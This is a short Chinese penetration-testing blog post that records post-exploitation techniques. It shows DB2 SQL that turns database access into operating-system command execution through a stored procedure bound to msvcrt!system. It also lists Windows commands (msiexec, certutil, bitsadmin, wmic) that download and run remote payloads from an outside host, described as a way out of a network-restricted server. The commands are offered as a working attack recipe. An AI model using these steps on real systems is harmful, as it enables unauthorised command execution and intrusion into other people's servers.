DB2 数据库权限执行系统命令
记录一下拿到db2数据库权限之后,进行系统命令执行的过程,db2默认绑定的是50000端口:
1、创建一个临时的表
CREATE TABLE 数据库名.表名 ( test VARCHAR (500) ) ;
2、创建存储过程(windows)
CREATE PROCEDURE db2_cmd_exec (IN cmd varchar(200)) EXTERNAL NAME 'c:\windows\system32\msvcrt!system' LANGUAGE C DETERMINISTIC PARAMETER STYLE DB2SQL
3、使用创建的存储过程db2_cmd_exec执行系统命令
CALL db2_cmd_exec ('dir D:\web\ > c:\whoami.log')
4、读取命令执行结果日志文件,写入到创建好的临时表中
CALL ADMIN_CMD('IMPORT FROM c:\whoami.log OF DEL INSERT INTO 表名')
msiexec在渗透中的使用
遇到一个台dns都不能出网的windows服务器,最后使用msiexec.exe从远程下载,居然可以出网,没搞明白啥原因。
msiexec.exe /i http://www.nxadmin.com/xxx.msi
命令执行之后,会自动加载远程.msi文件,并运行,只能加载运行.msi文件
其它一些命令的使用
certutil -urlcache -split -f http://www.nxadmin.com/xxxx.txt c:\xxxx.txt bitsadmin /rawreturn /transfer getfile http://www.nxadmin.com/xxxx.msi c:\xxxx.msi wmic os get /FORMAT:"http://www.nxadmin.com"
用到的一些nday漏洞
Spring Boot Actuator未授权访问远程代码执行漏洞
- 本文固定链接: http://www.nxadmin.com/penetration/1828.html
- 转载请注明: admin 于 阿德马Web安全 发表